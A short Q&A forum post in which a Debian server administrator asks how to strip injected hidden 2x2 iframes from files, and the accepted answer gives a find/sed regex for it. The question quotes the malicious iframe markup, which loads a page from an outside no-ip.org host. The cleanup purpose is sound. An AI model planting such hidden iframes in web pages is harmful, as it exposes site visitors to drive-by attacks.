Debian, Search and replace iframe injection

Question

We're running a Debian server and we have a malware or something doing code injection.

I know how to search and replace this string :

<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>

I do it this way :

find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'

My problem is the url http://ingvar2000.no-ip.org/jc/rss.php changes from files to files, so how can I search and replace :

<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>

Because the width, height, and frameborder is always the same.

score 1 · Accepted Answer · answered Mar 01 '13 at 14:21

1

Use

find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'

here [^"]* means 0 ore more characters of anything but ".

answered Mar 01 '13 at 14:21

Stone

1 Answers1